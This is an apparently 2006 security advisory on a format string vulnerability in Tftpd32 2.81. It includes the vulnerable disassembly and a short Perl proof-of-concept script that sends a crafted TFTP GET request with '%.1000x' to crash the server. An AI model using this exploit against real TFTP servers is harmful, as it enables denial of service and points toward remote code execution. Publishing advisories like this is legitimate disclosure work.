Critical security advisory #006
Tftpd32 2.81 Format String + DoS PoC
Critical Security - 22:03 2006.01.19
Critical Security research: http://www.critical.lt
Product site: http://tftpd32.jounin.net/
Credits : Critical Security Team (www.critical.lt)
Original Advisory: http://www.critical.lt/?vulnerabilities/200
Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability
by sending SEND or GET request with a specially formated string. Vulnerable code:

LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX                                 ; /Arglist
PUSH EDX                                 ; |Format
PUSH EAX                                 ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA

Proof of concept exploit:
http://www.critical.lt/research/tftpd32_281_dos.txt

#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "\x00\x01" ;   #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);